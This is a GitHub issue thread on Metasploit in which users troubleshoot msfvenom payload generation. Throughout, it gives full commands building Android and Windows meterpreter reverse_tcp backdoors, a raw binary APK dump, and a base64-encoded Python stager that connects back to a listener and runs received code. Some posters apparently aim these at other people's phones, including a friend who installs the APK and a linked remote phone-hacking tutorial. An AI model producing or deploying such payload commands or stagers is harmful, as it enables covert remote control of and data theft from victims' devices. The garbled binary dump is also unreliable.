Hi, i am using up-to date metasploit-framework, and while using msfvenom created android reverse_tcp payload but it wasn't working, the android was not running the app and was gving error, but i when i used an older version of msfvenom and also msfpayload those created right payload and it worked, the only visible difference that i found between latest version payload and older was the size, as the one created by latest version of msfvenom was 8.5 kb and the older was 7.5 kb but the older one works, also haven't tried creating payload for any other platform but the android one dosen't work in the latest version, may be some bug.
How did you create the payload and how did you install and execute it? Also what error you received? Paste the exact commands and error you encountered.
msfvenom -p android/meterpreter/reverse_tcp lhost=ip lport=port -a dalvik --platform android R -o /root/Desktop/sample.apk
No encoder or badchars specified, outputting raw payload
Payload size: 8487 bytes (the older version payload is 7,507 bytes)
Saved as: /root/Desktop/sample.apk
and its wasn't like an error but it just said : application not installed
@ortholinux You need to sign the apk as well. Take a look at https://github.com/rapid7/metasploit-payloads/pull/49 for an example.
OK so i've checked it, not only android but almost any other payload generated by msfvenom is not working, i've recently checked the windows/meterpreter/reverse_tcp and shell/reverse_tcp both are also not working and i guess same would be for many other payloads, on running the payloads windows just show a black screen for some time and then exit, and no sessions.
Must be a bug in new version, and may be should be notified to Rapid7.
@ortholinux Where is your -f option?
I checked with msfvenom --help-formats and there was no apk format in the list.
raw would be the format for this. And by default (it not specified), it is.
The syntax I use to create an apk is:
./msfvenom -p android/meterpreter/reverse_tcp lhost=your_ip lport=lport -o android.apk
The syntax I use to create a windows executable is:
./msfvenom -p windows/meterpreter/reverse_tcp lhost=your_ip lport=lport -f exe -o /tmp/test.exe
OK so i've checked it, not only android but almost any other payload generated by msfvenom is not working, i've recently checked the windows/meterpreter/reverse_tcp and shell/reverse_tcp both are also not working.
There's clearly something wrong with your environment. If msfvenom was properly broken and producing payloads that didn't work, the entire MSF user base would be screaming at us :smile:
How did you get metasploit-framework and on what platform is it running? That might provide a clue that would help.
Although i am using fresh install of kali sana currently but i guess i should have tested this also on some other distro too.
So after doing a fresh install of kali 2.0, i updated the metasploit from its directory.
then tried the payload and it failed.
There's clearly something wrong with your environment. If msfvenom was properly broken and producing payloads that didn't work, the entire MSF user base would be screaming at us.
yeah i too had this in mind, but the reason is (correct me if i am wrong) as for as i guess i am doing all fine or may be i am missing something.
I had a report yesterday on IRC of someone noting that the x86_64 version of Kali seemed to be missing DLLs that are present in other distributions (e.g. the ARM or i386 versions) - maybe there is a packaging error in Kali itself?
If your system is missing the contents of metasploit-payloads for some reason, I can see how it would look like msfvenom is not working. Can you check to see if you have files under /usr/share/metasploit-framework/vendor/bundle/ruby/2.1.0/gems/metasploit-payloads-*/data/meterpreter ?
i could only get to directories upto this:
/usr/share/metasploit-framework/vendor/bundle/ruby/2.1.0/gems/metasploit-payloads-1.0.16
and couldn't find next you specified.
Ah - if there is nothing after that, then this smells like a packaging error with Kali linux. I wonder why it would not have any payload gem contents.
Maybe update has something to do with it. I currently dont have kali2 iso and will need to download it, but if you have it try it as live and check the msfvenom then we might know was it the update or the default package.
I've a similar problem I'm using the github version of metasploit-framework, up-to-date the only thing is any time I start it, both msfconsole and msfvenom I get this warning:
WARNING: Nokogiri was built against LibXML version 2.9.2, but has dynamically loaded 2.9.1
but everything apparently works fine.. I'm trying the msfvenom tool on a virtualized Windows XP machine (the victim) and I do this command for create the executable with the payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=myip LPORT=4444 -e x86/shikata_ga_nai -f exe -o /home/myUser/Desktop/test.exe
and the file is correctly created... than I start the multi/handler on msfconsole and set the LHOST to my ip and LPORT to 4444 than I run it and it wait for a session.
Than I execute on the Windows machine the _test.exe_ file and look in the process list and it showed up.. but in the msfconsole no session is started even if is listening to _myip:4444_
I use openSUSE leap and the virtual box has Bridged connection so is in the same subnet.
What i'm doing wrong? Is maybe the Nokogiri warning the problem?
Edit: I just tested it with Kali's built in metasploit framework using 2 virtual machines, Win XP (the same victim as before) and Kali (the attacker) and it worked like a charm so, I guess I made something wrong while installing metasploit-framework on my SUSE laptop.. anyway if you have any suggestion of how to debug it on SUSE it will be apreciated!
Thanks in advance!
I think it is safe to say that the original issue reported here has long since been fixed.
Hello community !!
Listen I don't have a problem, but I have a questions that I haven't been able to figure out for myself and maybe an experienced user has been through the same and can help me .
The thing is that my payload only works on a certain Local IP on my system ( example 10.0.0.5 works , but 10.0.0.X doesn't ) . What is the reason for this ? ... I'm using DDNS and public IP on the payload ( so I'm not specifying any local IP address ) and I made sure to set the other IPs to static and to open the same ports ( an exact configuration of IP 10.0.0.5 )
So why is it only working on Local IP 10.0.0.5 and not with others if I'm using DDNS ? The reason I want to learn why this happens is because now I have two different machines, but in order to use the payload I have to shut the other one to make sure that there aren't to IPs on my local network with the same value. So what I hope to accomplish is to have a machine with 10.0.0.5 and another one with 10.0.0.10 and make the payload work on both .
Thank you so much for reading , I've tried many IPs . Only but still only 10.0.0.5 works
msfvenom -p android/meterpreter/reverse_tcp lhost=ip lport=port -a dalvik --platform android R -o /root/Desktop/sample.apk
No encoder or badchars specified, outputting raw payload
Payload size: 8487 bytes (the older version payload is 7,507 bytes)
Saved as: /root/Desktop/sample.apk
and its wasn't like an error but it just said : application not installed
just chech the apk permission change it by
chmod +x apkname.apk
chmod 777 apkname.apk
after that try installing the apk..
in my case it worked !!
Mr. Im work : /data/data/com.termux/files/home/metasploit-framework/msfvenom -p android/meterpreter/reverse_tcp lhost=127.0.0.1 lport=4444 -a dalvik --platform android R -o /storage/Backdoor.apk
just chech the apk permission change it by
Chmod *+
Chmod 777
After that try installing the apk
Issue not work erros intalling device nougat please help?
ot@fbi:~/Desktop# msfvenom -p android/meterpreter/reverse_tcp 0)02���� R��B�O����!��Cp�+"tE,^D�RC$j�3�D
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 10086 bytes
P�1fN�����PndroidManifest.xml��KoSGǏ�@�qB�1y@ O�@��@��"��]T�`B��+8��Z�������
U�K>@�]tQU�˪�
uY�
S�V{�B��F�E~&B��n�,tz��
=�����^@?B�@B3�2�S��g�7ë"�@��(��>�^B�a�<��YMtz��"�z����z�]�!�
�j� Nh���k�f�
�} }
��^A�uD����=��_�����7���P=za�v�m�m�<~��r�$C���K�q݄%����}���T@�]��K����=�z�-FM��s)E{��MK?��G ��o�~��3��I�?��V�"ε�-2�qԏ�te ��;��
�$jR�<�ef�#5�=z�T�8-#�5���.�h��3�~��O��t ��i��^��ۼ���5��~%S,��C-C>
\M?s�KI�az_/��[vγ������0�ȸ�2���E��,^�9�Ĕ�2z����d�_��F�z���lI�±,����*��7�eZO�
X^�^�H�����X{�j�7ތY�u��l���άॊ�K�s�$�+>A�·A�fw2;��D���p�>�����.��k�|��av�=��ûi�c)���<�����Ƕ���I�잛�N��n������>�13��t�,Qj��b~M�]���������b���}�M�I^�&./�
z�1��9��]қ���[瓃9�
������O�ϥ�8gz�z��2��DCb3�f�w
7K9^�El-b;��Q��[���k�8�
o\�b^������+^����9��K(^������ބ��[xǕ}��P�sէ��DQ���;%�NI\�����g����O�:�,}1-�i�A?�wJ�߱����Q���o
���6���ҲF�:�8��y����kVl�*� ��w�!�9��)^���9���Yx��{Qx/���O�ݷ�s�����Wb
�|�$�_R1%ŖTc>�0�'�M ;�⟴�{ƒ�T /?�s�>_"_����� ���n1W�� ˷O�7�}&�N
�����P�1fN-�� ���M��sL.�,�,�
�
�
z@��P�h�i)��4$-$�@bH���S�BШ��ov�I���=�;:��3w�ܙ�s���9����[�HԜ������zj_�+�)�����G~y�(MD'Ʒ�H�~���,�(�h��I�ty9�]�o�z@U��Ct_5Q4��nn>� �|�
�Y�A�!���c�S���W��������x
�/��2�2������
�< �pt�ځA �w��o�.��@x�q�Q���uC��N���'����8��|8���¦�����
L�n�Q�I�����K���Y�U�5�����t9�
�t�X\l�� �f���W������
�)���~ �
�V�4�%�i��+��m���e�
����@x/p'�)�A�1�[��~������p8��,p=p
p�Q�~��!� �i�Y���O�׀_�+�j�ہ~�:�L�8pp���}�
������%�5|@#p ���z#֞�Ć�h@3Z�U�j�
@�F��l�ہv��v�lS�L�@n��ܙ�$]��܄� ��0M�a���}�0pYqHĤ1?0��&�k�w�D�I ā�@8.�0���x���"�W��br�2���2��U2��MF�m����ʼ�
P���2_&�ԑ��" ~��|]�5bme�eb�L�����ϯ����ڇe�5�~[m��A����]�� ���r
!�v����Ώ��I���a�����-��)��Gl�{����i[�q[�k���W�m��2���Y[�5�2����;����8�b��{�2[�՞�����mz:m���X��Ji�Y��S�?���s���k���=��El�.��=�_E�_��1C�����?òm9��II���y9��~��1u�LU:%�f���J� I?�t�a_W��2���i��/�'~�����+�Ղ���5BV�Fٯ��i��m�����=��kh�cj���r�!����,;%ua�FD�3��
�~�<���0�2�ǣ6�/C��h9��������������f�찧9Vy�s�Z餤���TI_�Xh�K�?fj��N��Q�A"VX�z��ט�����"��<���$-��Zύ�J�CO0]�������j�
����L�K��aQ�\%i��C�n+p�3m��r
���m�yݻ��'��{�NI�bz���
�����"D:������n�p[�I� ��g�����f�Ϣ}t�����L��iI���M,��?���L��,���~��F-�˴���i}�i�d꧇���S|�X�^'�-�w���o1]��o��!i�n��>&ϐǙ��K:@g���e>S,=aX�L/�Ԛ�F��1u���ƒ߄���ϡ<�������Z��K��Բ�v��3��Lk���^dٽ��&�Y;����N��?b�B0��W�e�cW�n����n�;���+��a�ȴ����-�]�u3���}��U��|�����q�M?��e�}���<��������_�K)�2
� ���i��������>GZR?)�;�=$_s�x��9O���w���/D�g�.����#R�C���ko�
Z�6�gl��e}���zx����9ΫGe=^WK�f���⛰_��|jKp���U��^Ň�>F��EJ�x3p
p�����U����WMtĄ���ҁ0xf��*9��w*������8����B��.��ݸ.��Q
�V����zJ�=���1�*۸I}X�3?O�3�%(��j��m�
��-�c��(l'r(�}U��;��G��������~��t놇N�x�m_�����wx���~lY.��
mܱ�m���-�۶m�J��EZ�ҫ���J��J��J��J��J��J��J��J��J��J��J��J��J��J��J��N:�̈́x}\ů����I�v���3u7x^��
Y�*^0���OK�+(�����R�|3\E��K�B֑�o�.�z㥅�~y�֢��4���*$^wt�Gk�^_#�_I5���Ց/�7;��{��e�#�&������[�[�sO�wR#5�����&7t��k����Ԩ6Ѡ��U��5�C��O�+���a)
~���e��J���^Ւ9
nT-�k�A���8�ҐR�:8,)�Ԣ��a�7�u9B4���ͽZ:p�zm��
{�2
�:�I��_C��[Y�V�K�x���|->_{�2�6c��Y���ٛ�+Hф�AՄ�!����+)�k�P<�C�ft�ZNx��C>��V�+���+[���5��Q��2������x��VFU��ue����b�P%%���S����Z�i���HTh��^z�{Ju�hY-�z�hLm���]Z�]V-e�uҫ�m$ջ
+�:��ò/a����m;�����{�|�>����У�j��~���â����Xnk������Ij��9�� �N+(��i�i���e��#�
/i;�E��j�OidSU�]�,��b&��'�Q[o��t Ci�g�X�L�Of�k)��_♯���U7j]б��xfY>�^
ڃ�M$�[]
�~��Zv�W�
����)ޝ
��w"�b�I�='�{UQ�? �{���,ރ%qE+a�~�yF_õ�MV�7�ZЏOt�⫙T�P����X����������V�s@�\'r�=��^o�>Dx!������8������^��w���o
T��9�UM}1�@ga��7=��#�U�"V���O����tbjU����{�h�ۻIH6�k�v�tMQ5�p��މ��#E�uo
�l1"��Vb\��YժE�f^x7��?��p�.Uk�c"W�\�F6�'+���j�ΦZ-��6�T���_��v�nD�F�ԁY] �
�>�]�X���:ߣzS�o=�WK���1
tZg���S[��ߍ������ m��Gy��.��d�~�d���b�+���E�������:��T���ʨ�M��O�
t�qq��[�M���8ߜ��D�2���9�>�$���ԍؐ^�q��u����W1�'v�"?V*�@D7�(���TD�8)�'�����#���Zw��"�~�҉�G�;L�����ja��;ӄ��[���U+ޙ��u��^���%j����G4�������������N�=���{d�x��L(5�u�.���� ���Vjr�"*��%��!�ZG��>�|��-�Gpj�C
j�7/wRs����β��pʘ��]�l��z�ZŶsF&��i��F�=���]$N�]��>���'��
}��~�a��8I��^���|�� �:�S�~8u�Z��s:p="��X6�@w��`��^��O�-[oWm�l5�i
����s᷺z��ׂ�&��������d���Ș�թ���!.G$�J������?��;����BN��;�'�}�������a~�u9�&���$�Y�IWI܀����W��+i�m�V��,ul����:����u �_��e�}�<��h{�W��[}^.�X��.S+���Hk�y4�!�e'�;T�+�L���r����C��r
DH��yF�mhoߺc�F�0��D<32���D,�Å�
���T�_ZĖ22���F��\!YUE����pl{]��̦�Ȫ����
�=z�f��{G�,5.�c�%���]R+�PO�d�-ɪ�^�5��&^��l.�
�&��yX�([��ƍ$�cF<���Ǯ3?�&cʈ�>��6��0��� �X6�
���9gи���^m]G0eR�IǕaw�q���G�.p�:^پ���s%�%�2��!ȻG{{�
�|���
�N�
�ARB���
Lt�o��hP;q�=����n�'�W��rbɔ�4�
��hi�b[(QrEc�����&2y��+9��8U����ɇ13�m0��nn���Hm�ݦ-TZ{�V��|9h���u��7v]Ͼ��H�X�ޢ��R�]CXR�Ci�t�����$�iÌSyT�X=O�$)1�Ŧ�ر�d�x�F\�P��9c�T֠���3��������]�tRX��[b0�L&����7�n��8�R�����,� l7H&�a�H�S�<��qNe����m�q��Q5>�&qq��������Ljd��F&K���T!k;Q�r1l�e>�0�
�Ť�{���,�����1q?�.Uܟjy|���j�X|dՒ�s�F��U�EѾe-�BD
L3�!�6��AN�%M\�ɕ0�R�
�V..NlҦ1�D�� r'���ix_YBF?r%
�8^��(�o�����'NNr�LqϤ����A�)S^�e��Xzz���2|�ݨ"m�~Y:���B��F�$gZ�8�:�=+Br,�h걡2���\n�����r�O�\3̬I�Y���{��ȟ�/���95r9�E��P�̥��٤a�����ά�)U00�)�\�/��K� �8r�4��Rr_ g�2�@��5��
[��Mk�؇�0'��>�#��_�P���Nj�5-�o�(���W�Bɡ�D�t�Q�T@)��Qy�YQN�����W<����'��ȟ�T
sJ��k�Wj^N�+5��ɥ�O)�t���=p�5�� �4�Xᕫ٦�*[,�OWC���&���lî�U��X�
�fTU�gR�����LGO?<sRg��I.�-�������]�L$ o��
�+e}�Փ�M�2e48%��G���?�;O.2vh �h���x��b��_P�1fN��ʩ�META-INF/SIGNFILE.SF]�AO�0��������B�"Y�a�
ED.��e+��|_'^�h��M���҉ЀNV��x�F�qZ��������F�7��F����H����qGSauJ2��
g��mmG|���ɔ������Uf9�����G^��}oz���o�}R#�������a>���v?�o���A���n/85X�/���~$X&��d��ع�<�_P�1fN�Mil�2META-INF/SIGNFILE.RSA3hb�c��j�h����δ��]ޠ�]���ѐ߀��3�̓1���������qA�,�&��M�312u��C0��k���1��� ˆ���:��g��;���
.�I��r⼆f����&Q�Ʀ�F����F�Q$��Ĩ��
�������\LM��
�e�L���5���ĮH#w�R�"�K��넯�_<���s�;�{��g�w��bT��pnK�Pԫob�ϧF�&+�&6���j��ƅ5�-2�w�_�Q��
����;�t�zr�>��Y�H��,����͖���������O���i�;� m<;I�!Q����@s0�����۴�z�|�9�q��!cU�U����
i�?���hIb�W�=��Ni+�'��KX&��<�Y?([�C���_\U���;UU�bWže-r������%�-����9)�����=��AӮɀ�H��A�����%NX>��������R��(%u;e~��o���ږ3)O���{ݽ��Z��E�ՖK7O���v>�7q��.�R���mz��?�Լ��t��d��o�Lݎ��ؗ<Wt� ��7fVN�*�'�}E�n��(������I^�R��sH�}Wrޭտ�o�� Γ��]}yg����?1Jkȹ�(q}\u���p����>��
���ϗ?M����&��U�%�_ܦb������9����z�6�^�hY���k����� <�0��G�ĬM��TJǺ�'8h�G.�Q�K#�d�gl8c8��\,ޮ[�xR^�p�!+��s��*�2�9�-��{��������2�L���W�Y��}ױc6�y��JȜIٸ�C$UmM�Gxӛ�l7��_��������
�o-�W��S?����ğ��u���%����ΌL\�����sC�}\�r�ڭ~���\��2��e�ޘ�m�J����\��?��e��賻E��M��c%
Ͻ+���c��ao�xvO����i�ۿ�˩+Ge֚sS:|���m�L�H������]�& P�1fN�����PndroidManifest.xmlP�1fN-��<�resources.arscP�1fN�>�ڈ�M
�classes.dexPK�1fN PMETA-INF/P�1fN<ڒ�wMETA-INF/MANIFEST.MFP�1fN��ʩ�d META-INF/SIGNFILE.SFP�1fN�Mil�2k!META-INF/SIGNFILE.RSAPK��%
Ok, thanks for the mention.
can shell payload work on the latest Androids?
hello!
i m using windows 8.1!
when i install the apk file in my own phone ,the payload is working successfully!
but when i ask my friend to install the apk and click open, i get nothing! i mean no session is created..and terminal shows only "started reverse tcp handler ....."
whats the problem??
please help.......
hello!
i m using windows 8.1!
when i install the apk file in my own phone ,the payload is working successfully!
but when i ask my friend to install the apk and click open, i get nothing! i mean no session is created..and terminal shows only "started reverse tcp handler ....."
whats the problem??
please help.......
Because you haven't created the WAN payload. Try google ngROK with metasploit it will yield numerous results.
rawwould be the format for this. And by default (it not specified), it is.The syntax I use to create an apk is:
./msfvenom -p android/meterpreter/reverse_tcp lhost=your_ip lport=lport -o android.apkThe syntax I use to create a windows executable is:
./msfvenom -p windows/meterpreter/reverse_tcp lhost=your_ip lport=lport -f exe -o /tmp/test.exe
Done as u said...but can't found the apk file in storage can u locate where it is in android storage
Traceback (most recent call last):
ruby: No such file or directory -- /data/data/com.termux/files/usr/opt/metasploit-framework/msfvenom (LoadError)
Your Payload has not Generated Successfully. Please Try again.
how to fix please Traceback (most recent call last):
ruby: No such file or directory -- /data/data/com.termux/files/usr/opt/metasploit-framework/msfvenom (LoadError)
Your Payload has not Generated Successfully. Please Try again.
i used [1]--->> android/meterpreter/reverse_tcp
[2]--->> android/meterpreter/reverse_http
[3]--->> android/meterpreter/reverse_https
[4]--->> Exit
Đûčk |••| Đrôid/~ 1
ENTER Local IP :---->>> 154.158.197.12
ENTER Port No. :---->>> 4099
Enter your payload name:--> T4Termux
Creating Payload...
Traceback (most recent call last):
ruby: No such file or directory -- /data/data/com.termux/files/usr/opt/metasploit-framework/msfvenom (LoadError)
Your Payload has not Generated Successfully. Please Try again.
$
root@kali:/opt/metasploit-framework/bin# msfvenom –p android/meterpreter/reverse_tcp LHOST=192.168.43.21 LPORT=4444 R> /var/www/html/ilu12.apk
Error: No options
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /opt/metasploit-framework/bin/../embedded/framework/msfvenom [options]
Example: /opt/metasploit-framework/bin/../embedded/framework/msfvenom -p windows/meterpreter/reverse_tcp LHOST=
as u can see no android payload is available in msfvenom..
any solution for this?
i have also checked in payload option but creating an android payload is not available
root@kali:/opt/metasploit-framework/bin# msfvenom –p android/meterpreter/reverse_tcp LHOST=192.168.43.21 LPORT=4444 R> /var/www/html/ilu12.apk
Error: No options
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /opt/metasploit-framework/bin/../embedded/framework/msfvenom [options]
Example: /opt/metasploit-framework/bin/../embedded/framework/msfvenom -p windows/meterpreter/reverse_tcp LHOST= -f exe -o payload.exeas u can see no android payload is available in msfvenom..
any solution for this?
i have also checked in payload option but creating an android payload is not available
Use - not –.
root@kali:/opt/metasploit-framework/bin# msfvenom –p android/meterpreter/reverse_tcp LHOST=192.168.43.21 LPORT=4444 R> /var/www/html/ilu12.apk
Error: No options
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /opt/metasploit-framework/bin/../embedded/framework/msfvenom [options]
Example: /opt/metasploit-framework/bin/../embedded/framework/msfvenom -p windows/meterpreter/reverse_tcp LHOST= -f exe -o payload.exe
as u can see no android payload is available in msfvenom..
any solution for this?
i have also checked in payload option but creating an android payload is not availableUse
-not–.
i dont get it can u please elaborate
Notice the small length difference in the dash. The browser is using/showing a different - than you would typically type on the keyboard. Try typing the command out instead of copy/paste from the site
Notice the small length difference in the dash. The browser is using/showing a different - than you would typically type on the keyboard. Try typing the command out instead of copy/paste from the site
Oh thanku for that
Notice the small length difference in the dash. The browser is using/showing a different - than you would typically type on the keyboard. Try typing the command out instead of copy/paste from the site
Oh thanku for that
But why in my msfvenom payload option any "android" payload option not showing up
Notice the small length difference in the dash. The browser is using/showing a different - than you would typically type on the keyboard. Try typing the command out instead of copy/paste from the site
Oh thanku for that
But why in my msfvenom payload option any "android" payload option not showing up
Use -p not –p.
# ./msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.21 LPORT=4444 R> /var/www/html/ilu12.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 10187 bytes
# file /var/www/html/ilu12.apk
/var/www/html/ilu12.apk: Zip archive data, at least v2.0 to extract
Notice the small length difference in the dash. The browser is using/showing a different - than you would typically type on the keyboard. Try typing the command out instead of copy/paste from the site
Oh thanku for that
But why in my msfvenom payload option any "android" payload option not showing up
Use
-pnot–p.# ./msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.21 LPORT=4444 R> /var/www/html/ilu12.apk [-] No platform was selected, choosing Msf::Module::Platform::Android from the payload [-] No arch selected, selecting arch: dalvik from the payload No encoder specified, outputting raw payload Payload size: 10187 bytes # file /var/www/html/ilu12.apk /var/www/html/ilu12.apk: Zip archive data, at least v2.0 to extract
Yeah its working thank u for that
why the file isn't created

why the file isn't created
Use a hyphen - for your arguments rather than a long dash.
Sir ....it's a copy paste problem......I copied the command and pasted it on terminal that's why it didn't work.
this time I type the whole command ,,,,and now it's working
Sir ....it's a copy paste problem......I copied the command and pasted it on terminal that's why it didn't work.
this time I type the whole command ,,,,and now it's working
Yes, you copied a command which used a long dash rather than a hyphen -.
Where did you copy the command from? A lot of people have been making this mistake recently.
Sir ....it's a copy paste problem......I copied the command and pasted it on terminal that's why it didn't work.
this time I type the whole command ,,,,and now it's workingYes, you copied a command which used a long dash rather than a hyphen
-.Where did you copy the command from? A lot of people have been making this mistake recently.
from here I actually copied it >https://medium.com/@irfaanshakeel/hacking-android-phone-remotely-using-metasploit-43ccf0fbe9b8
from here I actually copied it >https://medium.com/@irfaanshakeel/hacking-android-phone-remotely-using-metasploit-43ccf0fbe9b8
Thanks
from here I actually copied it >https://medium.com/@irfaanshakeel/hacking-android-phone-remotely-using-metasploit-43ccf0fbe9b8
Thanks
welcome
from here I actually copied it >https://medium.com/@irfaanshakeel/hacking-android-phone-remotely-using-metasploit-43ccf0fbe9b8
Thanks
welcome
from here I actually copied it >https://medium.com/@irfaanshakeel/hacking-android-phone-remotely-using-metasploit-43ccf0fbe9b8
Thanks
welcome
why the operation is being failed to read....already I have see the output from the text...it's all right,but it's showing failed in terminal
You're in a meterpreter shell. cat is a meterpreter command. You're trying to cat the file on the remote host. You'll need to background the meterpreter shell (CTRL+Z) before you can use cat on local files.
Also, the Metasploit issue tracker is for tracking issues with Metasploit. Rather than post on closed issues, perhaps someone on IRC or Slack can help you out with your questions in future:
Sir can I add with u personally : |
On Sat, Aug 22, 2020 at 3:04 PM bcoles notifications@github.com wrote:
from here I actually copied it >
https://medium.com/@irfaanshakeel/hacking-android-phone-remotely-using-metasploit-43ccf0fbe9b8Thanks
welcome
why the operation is being failed to read....already I have see the output
from the text...it's all right,but it's showing failed in terminal
[image: image]
https://user-images.githubusercontent.com/62888889/90952816-810cb400-e488-11ea-9aa9-f43ca9bdd900.pngYou're in a meterpreter shell. cat is a meterpreter command. You're
trying to cat the file on the remote host. You'll need to background the
meterpreter shell (CTRL+Z) before you can use cat on local files.Also, the Metasploit issue tracker is for tracking issues with Metasploit.
Rather than post on closed issues, perhaps someone on IRC or Slack can help
you out with your questions in future:—
You are receiving this because you commented.
Reply to this email directly, view it on GitHub
https://github.com/rapid7/metasploit-framework/issues/6272#issuecomment-678616447,
or unsubscribe
https://github.com/notifications/unsubscribe-auth/AO7ZXONTFRV55PZ66WJDOELSB6C2VANCNFSM4BU4L6GA
.
Sir can I add with u personally : |
No, but you can find the invitation to the slack channel on the help page. The #general channel is the best place to ask questions.
ok Sir : ) ,I understand the matter.....thank you
On Sat, Aug 22, 2020 at 3:16 PM bcoles notifications@github.com wrote:
Sir can I add with u personally : |
No, but you can find the invitation to the slack channel on the help page
https://www.metasploit.com/help. The #general channel is the best place
to ask questions.—
You are receiving this because you commented.
Reply to this email directly, view it on GitHub
https://github.com/rapid7/metasploit-framework/issues/6272#issuecomment-678617575,
or unsubscribe
https://github.com/notifications/unsubscribe-auth/AO7ZXOMMHRV4NJOYKOMTAI3SB6EHTANCNFSM4BU4L6GA
.
Não quero mais receber emails, porem não estou conseguindo fazer o MERGE
no github, muito menos desescrever meu email, HELP!
Em sáb., 22 de ago. de 2020 às 06:29, AshrafulBubtCse32013 <
[email protected]> escreveu:
ok Sir : ) ,I understand the matter.....thank you
On Sat, Aug 22, 2020 at 3:16 PM bcoles notifications@github.com wrote:
Sir can I add with u personally : |
No, but you can find the invitation to the slack channel on the help page
https://www.metasploit.com/help. The #general channel is the best
place
to ask questions.—
You are receiving this because you commented.
Reply to this email directly, view it on GitHub
<
https://github.com/rapid7/metasploit-framework/issues/6272#issuecomment-678617575
,
or unsubscribe
<
https://github.com/notifications/unsubscribe-auth/AO7ZXOMMHRV4NJOYKOMTAI3SB6EHTANCNFSM4BU4L6GA.
—
You are receiving this because you are subscribed to this thread.
Reply to this email directly, view it on GitHub
https://github.com/rapid7/metasploit-framework/issues/6272#issuecomment-678618658,
or unsubscribe
https://github.com/notifications/unsubscribe-auth/ALPUYTTF76KIFEGVFLFAQFLSB6FYPANCNFSM4BU4L6GA
.
hlw could u please help me......
metasploitable virtual machine disk not found when I try to select it for installing it at vmware

payload is not getting saved
~/Desktop$ msfvenom -p python/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=4444 .o backdoor.py
[-] No platform was selected, choosing Msf::Module::Platform::Python from the payload
[-] No arch selected, selecting arch: python from the payload
No encoder specified, outputting raw payload
Payload size: 429 bytes
exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzEwLjAuMi4xNScsNDQ0NCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo=')[0]))
can anyone tell me what to do
payload is not getting saved
~/Desktop$ msfvenom -p python/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=4444 .o backdoor.py
[-] No platform was selected, choosing Msf::Module::Platform::Python from the payload
[-] No arch selected, selecting arch: python from the payload
No encoder specified, outputting raw payload
Payload size: 429 bytes
exec(import('base64').b64decode(import('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzEwLjAuMi4xNScsNDQ0NCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo=')[0]))can anyone tell me what to do
Command line flags begin with a hyphen - not a dot .
hii
I am getting error while downloading and uploading files with payload binded with an apk
Even I'm facing an error while downloading and uploading files with payload. I created and manages it with KageGUI. It says Operation failed, Permission Required.
Does anyone know of a fix for this issue?